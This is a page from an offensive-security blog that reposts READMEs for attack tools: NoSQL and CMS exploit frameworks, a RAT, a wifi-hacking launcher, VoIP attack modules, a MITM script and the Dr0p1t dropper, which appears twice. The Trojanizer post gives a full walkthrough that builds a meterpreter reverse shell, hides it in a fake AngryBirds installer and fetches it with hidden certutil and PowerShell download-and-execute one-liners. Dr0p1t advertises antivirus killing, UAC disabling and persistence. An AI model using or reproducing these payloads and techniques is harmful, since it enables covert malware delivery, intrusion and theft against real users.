Security of Information, Threat Intelligence, Hacking, Offensive Security, Pentest, Open Source, Hackers Tools, Leaks, Pr1v8, Premium Courses Free, etc

  • Penetration Testing Distribution - BackBox

    BackBox is a penetration test and security assessment oriented Ubuntu-based Linux distribution providing a network and informatic systems analysis toolkit. It includes a complete set of tools required for ethical hacking and security testing...
  • Pentest Distro Linux - Weakerth4n

    Weakerth4n is a penetration testing distribution which is built from Debian Squeeze.For the desktop environment it uses Fluxbox...
  • The Amnesic Incognito Live System - Tails

    Tails is a live system that aims to preserve your privacy and anonymity. It helps you to use the Internet anonymously and circumvent censorship...
  • Penetration Testing Distribution - BlackArch

    BlackArch is a penetration testing distribution based on Arch Linux that provides a large amount of cyber security tools. It is an open-source distro created specially for penetration testers and security researchers...
  • The Best Penetration Testing Distribution - Kali Linux

    Kali Linux is a Debian-based distribution for digital forensics and penetration testing, developed and maintained by Offensive Security. Mati Aharoni and Devon Kearns rewrote BackTrack...
  • Friendly OS designed for Pentesting - ParrotOS

    Parrot Security OS is a cloud friendly operating system designed for Pentesting, Computer Forensic, Reverse engineering, Hacking, Cloud pentesting...
Showing posts with label Frameworks. Show all posts
Showing posts with label Frameworks. Show all posts

Sunday, January 28, 2018

A Framework For NoSQL Scanning and Exploitation - NoSQL Exploitation Framework 2.0



A FrameWork For NoSQL Scanning and Exploitation Framework Authored By Francis Alexander.

Added Features:
  • First Ever Tool With Added Support For Mongo,Couch,Redis,H-Base,Cassandra
  • Support For NoSQL WebAPPS
  • Added payload list for JS Injection,Web application Enumeration.
  • Scan Support for Mongo,CouchDB and Redis
  • Dictionary Attack Support for Mongo,Cocuh and Redis
  • Enumeration Module added for the DB's,retrieves data in db's @ one shot.
  • Currently Discover's Web Interface for Mongo
  • Shodan Query Feature
  • MultiThreaded IP List Scanner
  • Dump and Copy Database features Added for CouchDB
  • Sniff for Mongo,Couch and Redis

Change Log V2.0:
  • Modularised approach, Now comes with Configuration file, tweak to your customization
  • Multithreaded dictionary attacks,file enumeration
  • Support for Heuristic based Redis remote file enumeration,Added Redis System enumeration
  • Now select Databases depending upon options -d "Database" -t "table" -d "Dump"
  • Improved Scan Support for Mongo,CouchDB,Redis,Cassandra and H-Base
  • Improved dump feature
  • Bug fixes

Installation
  • Install Pip, sudo apt-get install python-setuptools;easy_install pip
  • pip install -r requirements.txt
  • python nosqlframework.py -h (For Help Options)

Installation on Mac/Kali
  • Removed the scapy module by default for mac. So this should run by default. If you need to sniff run the script and then continue.
  • Run installformac-kali.sh directly
  • python nosqlframework.py -h (For Help Options)

Installing Nosql Exploitaiton Framework in Virtualenv
  • virtualenv nosqlframework
  • source nosqlframework/bin/activate
  • pip install -r requirements.txt
  • nosqlframework/bin/python nosqlframework.py -h (For Help Options)
  • deactivate (After usage)

Sample Usage
nosqlframework.py -ip localhost -scan
nosqlframework.py -ip localhost -dict mongo -file b.txt
nosqlframework.py -ip localhost -enum couch
nosqlframework.py -ip localhost -enum redis
nosqlframework.py -ip localhost -clone couch




Share:

Tuesday, January 23, 2018

Trojanize Your Payload (WinRAR [SFX] Automatization) - Trojanizer


The Trojanizer tool uses WinRAR (SFX) to compress the two files input by user, and transforms it into an SFX executable(.exe) archive. The sfx archive when executed it will run both files (our payload and the legit appl at the same time).

To make the archive less suspicious to target at execution time, trojanizer will try to replace the default icon(.ico) of the sfx file with a user-selected one, and supress all SFX archive sandbox msgs (Silent=1 | Overwrite=1).

Trojanizer will not build trojans, but from target perspective, it replicates the trojan behavior'
(execute the payload in background, while the legit application executes in foreground).

DEPENDENCIES (backend applications)

Zenity (bash-GUIs) | Wine (x86|x64) | WinRAr.exe (installed-in-wine)
"Trojanizer.sh will download/install all dependencies as they are needed"

It is recomended to edit and config the option: SYSTEM_ARCH=[ your_sys_arch ] in the 'settings' file before attempting to run the tool for the first time.


PAYLOADS (agents) ACCEPTED

.exe | .bat | .vbs | .ps1
"All payloads that windows/SFX can auto-extract-execute"

HINT: If sellected 'SINGLE_EXEC=ON' in the settings file, then trojanizer will accept any kind of extension to be inputed.

LEGIT APPLICATIONS ACCEPTED (decoys)

.exe | .bat | .vbs | .ps1 | .jpg | .bmp | .doc | .ppt | etc ..
"All applications that windows/SFX can auto-extract-execute"

ADVANCED SETTINGS


Trojanizer 'advanced options' are only accessible in the 'settings' file, and they can only be configurated before running the main tool (Trojanizer.sh)

-- Presetup advanced option
Trojanizer can be configurated to execute a program + command before the extraction/execution of the two compressed files (SFX archive). This allow users to take advantage of pre-installed software to execute a remote command before the actual extraction occurs in target system. If active, trojanizer will asks (zenity sandbox) for the command to be executed 


-- single_file_execution
Lets look at the follow scenario: You have a dll payload to input that you need to execute upon extraction, but sfx archives can not execute directly dll files, This setting allow users to input one batch script(.bat) that its going to be used to execute the dll payload. All that Trojanizer needs to Do its to instruct the SFX archive to extract both files and them execute the script.bat 


single_file_execution switch default behavior its to compress the two files inputed by user but only execute one of them at extraction time (the 2º file inputed will be executed) ...

TROJANIZER AND APPL WHITELISTING BYPASSES

A lot of awesome work has been done by a lot of people, especially @subTee, regarding  application whitelisting bypass, which is eventually what we want here: execute arbitrary code abusing Microsoft built-in binaries. Windows oneliners to download remote payload and execute arbitrary code

The follow exercise describes how to use trojanizer 'single_file_execution' and 'Presetup' advanced switchs to drop (remote download) and execute any payload using 'certutil' or 'powershell' appl_whitelisting_bypass oneliners ...

1º - use metasploit to build our payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.69 LPORT=666 -f exe -o payload.exe

2º - copy payload.exe to apache2 webroot and start service
cp payload.exe /var/www/html/payload.exe
service apache2 start

3º - edit Trojanizer 'settings' file and activate:
PRE_SETUP=ON
SINGLE_EXEC=ON

4º - running trojanizer tool
PAYLOAD TO BE COMPRESSED => /screenshot.png (it will not matter what you compress)
EXECUTE THIS FILE UPON EXTRACTION => /AngryBirds.exe (to be executed as decoy application)
PRESETUP SANDBOX => cmd.exe /c certutil -urlcache -split -f 'http://192.168.1.69/payload.exe', '%TEMP%\\payload.exe'; Start-Process '%TEMP%\\payload.exe'
SFX FILENAME => AngryBirds_installer (the name of the sfx archive to be created)
REPLACE ICON => Windows-Store.ico OR Steam-logo.ico

5º - start a listenner, and send the sfx archive to target using social enginnering
msfconsole -x 'use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.1.69; set lport 666; exploit'

When the sfx archive its executed, it will download payload.exe from our apache2 webserver to target and execute it before extract 'screenshot.png' and 'AngryBirds.exe' (last one will be executed to serve as decoy)

The follow oneliner uses 'powershell(Downloadfile+start)' method to achieve the same as previous 'certutil' exercise ..
cmd.exe /c powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://192.168.1.69/payload.exe', '%TEMP%\\payload.exe') & start '%TEMP%\\payload.exe'

The follow oneliner uses 'powershell(IEX+downloadstring)' method to achieve allmost the same (payload.ps1 does not touch disk)
cmd.exe /c powershell.exe -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.69/payload.ps1'))"

DOWNLOAD/INSTALL
1º - Download framework from github
     git clone https://github.com/r00t-3xp10it/trojanizer.git

2º - Set files execution permitions
     cd trojanizer
     sudo chmod +x *.sh

3º - config framework
     nano settings

4º - Run main tool
     sudo ./Trojanizer.sh

Framework Screenshots

xsf.conf - execute both files upon extraction (trojan behavior)



xsf.conf - single_file_execution + Presetup (advanced options)


xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (certutil)


xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (powershell IEX)


Final sfx archive with icon changed


Inside the sfx archive (open with winrar) - trojan behavior


Inside the sfx archive (open with winrar) - single_file_execution



Video tutorials

Trojanizer - single_file_execution (not trojan behavior)


Trojanizer - AVG anti-virus fake installer (trojan behavior)




Share:

Tuesday, January 16, 2018

Remote Administration Tool for Windows - QuasarRAT


Quasar is a fast and light-weight remote administration tool coded in C#. Providing high stability and an easy-to-use user interface, Quasar is the perfect remote administration solution for you.

Features
  • TCP network stream (IPv4 & IPv6 support)
  • Fast network serialization (NetSerializer)
  • Compressed (QuickLZ) & Encrypted (AES-128) communication
  • Multi-Threaded
  • UPnP Support
  • No-Ip.com Support
  • Visit Website (hidden & visible)
  • Show Messagebox
  • Task Manager
  • File Manager
  • Startup Manager
  • Remote Desktop
  • Remote Webcam
  • Remote Shell
  • Download & Execute
  • Upload & Execute
  • System Information
  • Computer Commands (Restart, Shutdown, Standby)
  • Keylogger (Unicode Support)
  • Reverse Proxy (SOCKS5)
  • Password Recovery (Common Browsers and FTP Clients)
  • Registry Editor

Requirements
  • .NET Framework 4.0 Client Profile (Download)
  • Supported Operating Systems (32- and 64-bit)
    • Windows XP SP3
    • Windows Server 2003
    • Windows Vista
    • Windows Server 2008
    • Windows 7
    • Windows Server 2012
    • Windows 8/8.1
    • Windows 10

Compiling
Open the project in Visual Studio and click build, or use one of the batch files included in the root directory.
Batch file Description
build-debug.bat Builds the application using the debug configuration (for testing)
build-release.bat Builds the application using the release configuration (for publishing)

Building a client
Build configuration Description
debug configuration The pre-defined Settings.cs will be used. The client builder does not work in this configuration. You can execute the client directly with the specified settings.
release configuration Use the client builder to build your client otherwise it is going to crash.


Share:

Sunday, January 7, 2018

A CMS Exploit Framework - cmsPoc



A CMS Exploit Framework.

Requirements
  • python2.7
  • Works on Linux, Windows

Usage
usage: cmspoc.py [-h]
 -t TYPE -s SCRIPT -u URL

optional arguments:
  -h, --help            show this help message and exit
  -t TYPE, --type TYPE  e.g.,phpcms
  -s SCRIPT, --script SCRIPT
                        Select script
  -u URL, --url URL     Input a target url

Examples
python cmspoc.py -t phpcms -s v960_sqlinject_getpasswd -u http://10.10.10.1:2500/phpcms960


Scripts
TYPE SCRIPT DESCRIPTION
phpcms v960_sqlinject_getpasswd phpcmsv9.6.0 wap模块 sql注入 获取passwd
icms v701_sqlinject_getadmin icmsv7.0.1 admincp.php sql注入 后台任意登陆
discuz v34_delete_arbitary_files discuz ≤ v3.4 任意文件删除
beecms v40_fileupload_getshell beecms ≤ V4.0_R_20160525 文件上传漏洞


Share:

Saturday, September 9, 2017

This script will make your life easier, and of course faster - lscript


This is a script that automates many procedures about wifi penetration and hacking.

Features

Enabling-Disabling interfaces faster Changing Mac faster Anonymizing yourself faster View your public IP faster View your MAC faster

TOOLS
You can install whichever tool(s) you want from within lscript! 
Fluxion    by Deltaxflux
WifiTe    by derv82
Wifiphisher   by Dan McInerney
Zatacker   by LawrenceThePentester
Morpheus   by Pedro ubuntu  [ r00t-3xp10it ]
Osrframework   by i3visio
Hakku    by 4shadoww
Trity    by Toxic-ig
Cupp    by Muris Kurgas
Dracnmap   by Edo -maland-
Fern Wifi Cracker  by Savio-code
Kichthemout   by Nikolaos Kamarinakis & David SchĂźtz
BeeLogger   by Alisson Moretto - 4w4k3
Ghost-Phisher   by Savio-code
Mdk3-master                     by Musket Developer
Anonsurf                        by Und3rf10w
The Eye                         by EgeBalci
Airgeddon                       by v1s1t0r1sh3r3
Xerxes                          by zanyarjamal
Ezsploit                        by rand0m1ze
Katana framework                by PowerScript
4nonimizer                      by Hackplayers
Sslstrip2                       by LeonardoNve
Dns2proxy                       by LeonardoNve
Pupy                            by n1nj4sec
Zirikatu                        by pasahitz
TheFatRat                       by Sceetsec
Angry IP Scanner                by Anton Keks
Sniper                          by 1N3
ReconDog                        by UltimateHackers
RED HAWK                        by Tuhinshubhra
Routersploit                    by Reverse shell
CHAOS                           by Tiagorlampert
Winpayloads                     by Ncc group 
Wifi password scripts
Handshake       (WPA-WPA2)
Find WPS pin    (WPA-WPA2)
WEP hacking     (WEP)    
Others
Email spoofing
Metasploit automation (create payloads,listeners,save listeners for later etc...)
Auto eternalblue exploiting (check on ks) -> hidden shortcuts

How to install
(make sure you are a root user)
Be carefull.If you download it as a .zip file, it will not run.Make sure to follow these simple instructions.
cd
git clone https://github.com/arismelachroinos/lscript.git
cd lscript
chmod +x install.sh
./install.sh

How to run it
(make sure you are a root user)
open terminal
type  "l"
press enter
(Not even "lazy"!! Just "l"! The less you type , the better!)

How to uninstall
cd /root/lscript
./uninstall.sh
rmdir -r /root/lscript 

How to update
Run the script
Type "update"

Things to keep in mind
1)you should be a root user to run the script
2)you should contact me if something doesnt work (Write it on the "issues" tab at the top)
3)you should contact me if you want a feature to be added (Write it on the "issues" tab at the top)

Video


Screenshots






Share:

Tuesday, August 29, 2017

Blind Attacking Framework - BAF



What is BAF ?
  • it's a framework written in python [2.7] that is being made specially for blind attacking , ie : attacking random targets with common security issues , targets are generated by the hackers search engine "shodan" and vulnerable hosts are hacked in an automated way .
  • this framework is completely "neutral" ie: it's not based on shodan API and it has total dependence on web scraping , ie: the only limit on what you can do with it is your immagination as a tester & our programming skills as contributers/owners .

how to use BAF ?
  • fire up a terminal and sudo apt-get update && apt-get upgrade && apt-get dist-upgrade
  • install [ requests , httplib , urllib , time , bs4 "BeautifulSoup" , colored , selenium , sys ] python modules
  • python BAF_0.1.0.py
  • enter your shodan's account username and pass
  • choose 1 , let it do it's job , press y , close the previous tab , press y ,close the previous tabs ...etc till u have the vulnerable cams only
  • choose 2 , enter what do u want to search for (ie: NSA) , when it's done , refer to the targets text file , it will contain the targets ip:port
  • that's all , till now :)
  • DON'T close a loading webpage
  • beta versions will make automated browser open for better understanding ,but you can close the webcam tabs freely

Screenshots




Share:

Thursday, July 27, 2017

VoIP Penetration Testing and Exploitation Kit - Viproy



Viproy Voip Pen-Test Kit provides penetration testing modules for VoIP networks. It supports signalling analysis for SIP and Skinny protocols, IP phone services and network infrastructure. Viproy 2.0 is released at Blackhat Arsenal USA 2014 with TCP/TLS support for SIP, vendor extentions support, Cisco CDP spoofer/sniffer, Cisco Skinny protocol analysers, VOSS exploits and network analysis modules. Furthermore, Viproy provides SIP and Skinny development libraries for custom fuzzing and analyse modules.

Current Version and Updates
Current version: 4.1 (Requires ruby 2.1.X and Metasploit Framework Github Repo)
Pre-installed repo: https://github.com/fozavci/metasploit-framework-with-viproy

Homepage of Project
http://viproy.com

Talks

Black Hat USA 2016 - VoIP Wars: The Phreakers Awaken
https://www.slideshare.net/fozavci/voip-wars-the-phreakers-awaken
https://www.youtube.com/watch?v=rl_kp5UZKlw

DEF CON 24 - VoIP Wars: The Live Workshop
To be added later

Black Hat Europe 2015 - VoIP Wars: Destroying Jar Jar Lync
http://www.slideshare.net/fozavci/voip-wars-destroying-jar-jar-lync-unfiltered-version
https://youtu.be/TMdiXYzY8qY

DEF CON 23 - The Art of VoIP Hacking Workshop Slide Deck
http://www.slideshare.net/fozavci/the-art-of-voip-hacking-defcon-23-workshop
https://youtu.be/hwDD7K9oXeI

Black Hat USA 2014 / DEF CON 22 - VoIP Wars: Attack of the Cisco Phones
https://www.youtube.com/watch?v=hqL25srtoEY

DEF CON 21 - VoIP Wars: Return of the SIP
https://www.youtube.com/watch?v=d6cGlTB6qKw

Attacking SIP/VoIP Servers Using Viproy
https://www.youtube.com/watch?v=AbXh_L0-Y5A

Current Testing Modules
  • SIP Register
  • SIP Invite
  • SIP Message
  • SIP Negotiate
  • SIP Options
  • SIP Subscribe
  • SIP Enumerate
  • SIP Brute Force
  • SIP Trust Hacking
  • SIP UDP Amplification DoS
  • SIP Proxy Bounce
  • Skinny Register
  • Skinny Call
  • Skinny Call Forward
  • CUCDM Call Forwarder
  • CUCDM Speed Dial Manipulator
  • MITM Proxy TCP
  • MITM Proxy UDP
  • Cisco CDP Spoofer
  • Boghe VoIP Client INVITE PoC Exploit (New)
  • Boghe VoIP Client MSRP PoC Exploit (New)
  • SIP Message with INVITE Support (New)
  • Sample SIP SDP Fuzzer (New)
  • MSRP Message Tester with SIP INVITE Support (New)
  • Sample MSRP Message Fuzzer with SIP INVITE Support (New)
  • Sample MSRP Message Header Fuzzer with SIP INVITE Support (New)

Documentation

Installation
Copy "lib" and "modules" folders' content to Metasploit root directory.
Mixins.rb File (lib/msf/core/auxiliary/mixins.rb) should contains the following lines
require 'msf/core/auxiliary/sip'
require 'msf/core/auxiliary/skinny'
require 'msf/core/auxiliary/msrp'

Usage of SIP Modules
https://github.com/fozavci/viproy-voipkit/blob/master/SIPUSAGE.md

Usage of Skinny Modules
https://github.com/fozavci/viproy-voipkit/blob/master/SKINNYUSAGE.md

Usage of Auxiliary Viproy Modules
https://github.com/fozavci/viproy-voipkit/blob/master/OTHERSUSAGE.md


Share:

Friday, May 26, 2017

A Framework That Creates An Advanced FUD Dropper With Some Tricks - Dr0p1t-Framework 1.2


Have you ever heard about trojan droppers ?

In short dropper is type of trojans that downloads other malwares and Dr0p1t gives you the chance to create a dropper that bypass most AVs and have some tricks ;)

Features
  • Framework works with Windows and Linux
  • Download executable on target system and execute it silently..
  • The executable size small compared to other droppers generated the same way
  • Self destruct function so that the dropper will kill and delete itself after finishing it work
  • Adding executable after downloading it to startup
  • Adding executable after downloading it to task scheduler ( UAC not matters )
  • Finding and killing the antivirus before running the malware
  • Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable
  • The ability to disable UAC
  • In running powershell scripts it can bypass execution policy
  • Using UPX to compress the dropper after creating it
  • Choose an icon for the dropper after creating it

Screenshots

On Windows




On Linux (Backbox)






Help menu
Usage: Dr0p1t.py Malware_Url [Options]

options:
  -h, --help   show this help message and exit
  -s           Add your malware to startup (Persistence)
  -t           Add your malware to task scheduler (Persistence)
  -k           Kill antivirus process before running your malware.
  -b           Run this batch script before running your malware. Check scripts folder
  -p           Run this powershell script before running your malware. Check scripts folder
  -v           Run this vbs script before running your malware. Check scripts folder
  --only32     Download your malware for 32 bit devices only
  --only64     Download your malware for 64 bit devices only
  --upx        Use UPX to compress the final file.
  --nouac      Disable UAC on victim device
  --nocompile  Tell the framework to not compile the final file.
  -i           Use icon to the final file. Check icons folder.
  -q           Stay quite ( no banner )
  -u           Check for updates
  -nd          Display less output information

Examples
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --nouac -i flash.ico

Prerequisites
  • Python 2 or Python 3.
The recommended version for Python 2 is 2.7.x , the recommended version for Python 3 is 3.5.x and don't use 3.6 because it's not supported yet by PyInstaller
  • Python libraries requirements in requirements.txt

Needed dependencies for linux
  • Wine
  • Python 2.7 on Wine Machine
Note : You must have root access

Installation
if you are on linux and do
git clone https://github.com/D4Vinci/Dr0p1t-Framework
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
pip install -r requirements.txt
./Dr0p1t.py
And if you are on windows download it and then do
cd Dr0p1t-Framework
pip install -r requirements.txt
pip install -r windows_requirements.txt
./Dr0p1t.py
Libraries in windows_requirements.txt are used to enable unicodes in windows which will make coloring possible

Tested on:
  • Kali Linux - SANA
  • Ubuntu 14.04-16.04 LTS
  • Windows 10/8.1/8

Changelog v1.2
  • Pyinstaller compiling in Linux using wine
  • Pyinstaller compiling in Windows will not use UPX and that will fix the compiling in windows
  • Added the ability to disable and bypass UAC
  • Updated the antivirus list in the antivirus killer
  • Added SelfDestruct function so that the dropper will kill and delete itself after finishing it work 
  • Full framework rewrite and recheck to fix errors, typos and replacing some libraries to make the size of the final file smaller
  • Started working in some SE tricks to fool the user and there's a lot of good options in the way ;) Stay Tuned

Contact


Share:

Saturday, May 6, 2017

A Framework That Creates An Advanced FUD Dropper With Some Tricks - Dr0p1t-Framework 1.2


Have you ever heard about trojan droppers ?

In short dropper is type of trojans that downloads other malwares and Dr0p1t gives you the chance to create a dropper that bypass most AVs and have some tricks ;)

Features
  • Framework works with Windows and Linux
  • Download executable on target system and execute it silently..
  • The executable size small compared to other droppers generated the same way
  • Self destruct function so that the dropper will kill and delete itself after finishing it work
  • Adding executable after downloading it to startup
  • Adding executable after downloading it to task scheduler ( UAC not matters )
  • Finding and killing the antivirus before running the malware
  • Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable
  • The ability to disable UAC
  • In running powershell scripts it can bypass execution policy
  • Using UPX to compress the dropper after creating it
  • Choose an icon for the dropper after creating it

Screenshots

On Windows




On Linux (Backbox)






Help menu
Usage: Dr0p1t.py Malware_Url [Options]

options:
  -h, --help   show this help message and exit
  -s           Add your malware to startup (Persistence)
  -t           Add your malware to task scheduler (Persistence)
  -k           Kill antivirus process before running your malware.
  -b           Run this batch script before running your malware. Check scripts folder
  -p           Run this powershell script before running your malware. Check scripts folder
  -v           Run this vbs script before running your malware. Check scripts folder
  --only32     Download your malware for 32 bit devices only
  --only64     Download your malware for 64 bit devices only
  --upx        Use UPX to compress the final file.
  --nouac      Disable UAC on victim device
  --nocompile  Tell the framework to not compile the final file.
  -i           Use icon to the final file. Check icons folder.
  -q           Stay quite ( no banner )
  -u           Check for updates
  -nd          Display less output information

Examples
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --nouac -i flash.ico

Prerequisites
  • Python 2 or Python 3.
The recommended version for Python 2 is 2.7.x , the recommended version for Python 3 is 3.5.x and don't use 3.6 because it's not supported yet by PyInstaller
  • Python libraries requirements in requirements.txt

Needed dependencies for linux
  • Wine
  • Python 2.7 on Wine Machine
Note : You must have root access

Installation
if you are on linux and do
git clone https://github.com/D4Vinci/Dr0p1t-Framework
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
pip install -r requirements.txt
./Dr0p1t.py
And if you are on windows download it and then do
cd Dr0p1t-Framework
pip install -r requirements.txt
pip install -r windows_requirements.txt
./Dr0p1t.py
Libraries in windows_requirements.txt are used to enable unicodes in windows which will make coloring possible

Tested on:
  • Kali Linux - SANA
  • Ubuntu 14.04-16.04 LTS
  • Windows 10/8.1/8

Changelog v1.2
  • Pyinstaller compiling in Linux using wine
  • Pyinstaller compiling in Windows will not use UPX and that will fix the compiling in windows
  • Added the ability to disable and bypass UAC
  • Updated the antivirus list in the antivirus killer
  • Added SelfDestruct function so that the dropper will kill and delete itself after finishing it work :smile:
  • Full framework rewrite and recheck to fix errors, typos and replacing some libraries to make the size of the final file smaller
  • Started working in some SE tricks to fool the user and there's a lot of good options in the way ;) Stay Tuned

Contact


Share:

Monday, January 2, 2017

Poison, Reset, Spoof, Redirect MITM Script - creak



Performs some of the most famous MITM attack on target addresses located in a local network. Among these, deny navigation and download capabilities of a target host in the local network performing an ARP poison attack and sending reset TCP packets to every request made to the router. Born as a didactic project for learning python language, I decline every responsibility for any abuse, including malevolent or illegal use of this code.

Installation
$ git clone https://github.com/codepr/creak.git
$ cd creak
$ python setup.py install
or simply clone the repository and run the creak.py after all requirements are installed:
$ git clone https://github.com/codepr/creak.git
It is required to have installed pcap libraries for raw packet manipulations and dpkt module, for dns spoofing options is required to have installed dnet module from libdnet package, do not confuse it with pydnet (network evaluation tool) module. It can use also scapy if desired, can just be set in the config.py file.

Options
Usage: creak.py [options] dev

Options:
  -h, --help           show this help message and exit
  -1, --sessions-scan  Sessions scan mode
  -2, --dns-spoof      Dns spoofing
  -3, --session-hijack Try to steal a TCP sessions by desynchronization (old technique)
  -x, --spoof          Spoof mode, generate a fake MAC address to be used
                       during attack
  -m MACADDR           Mac address octet prefix (could be an entire MAC
                       address in the form AA:BB:CC:DD:EE:FF)
  -M MANUFACTURER      Manufacturer of the wireless device, for retrieving a
                       manufactur based prefix for MAC spoof
  -s SOURCE            Source ip address (e.g. a class C address like
                       192.168.1.150) usually the router address
  -t TARGET            Target ip address (e.g. a class C address like
                       192.168.1.150), can be specified multiple times
  -p PORT              Target port to shutdown
  -a HOST              Target host that will be redirect while navigating on
                       target machine
  -r REDIR             Target redirection that will be fetched instead of host
                       on the target machine
  -v, --verbose        Verbose output mode
  -d, --dotted         Dotted output mode

Example
Most basic usage: Deny all traffic to the target host
$ python creak.py -t 192.168.1.30 wlan0
Set a different gateway:
$ python creak.py -s 192.168.1.2 -t 192.168.1.30 wlan0
Set a different mac address for the device:
$ python creak.py -m 00:11:22:33:44:55 -t 192.168.1.30 wlan0
Spoof mac address generating a fake one:
$ python creak.py -x -t 192.168.1.30 wlan0
Spoof mac address generating one based on manufacturer(e.g Xeros):
$ python creak.py -x -M xeros -t 192.168.1.30 wlan0
DNS spoofing using a fake MAC address, redirecting ab.xy to cd.xz(e.g. localhost):
$ python creak.py -x -M xeros -t 192.168.1.30 -a www.ab.xy -r www.cd.xz wlan0
Deny multiple hosts in the subnet:
$ python creak.py -x -t 192.168.1.30 -t 192.168.1.31 -t 192.168.1.32 wlan0



Share:
Copyright © Offensive Sec Blog | Powered by OffensiveSec
Design by OffSec | Theme by Nasa Records | Distributed By Pirate Edition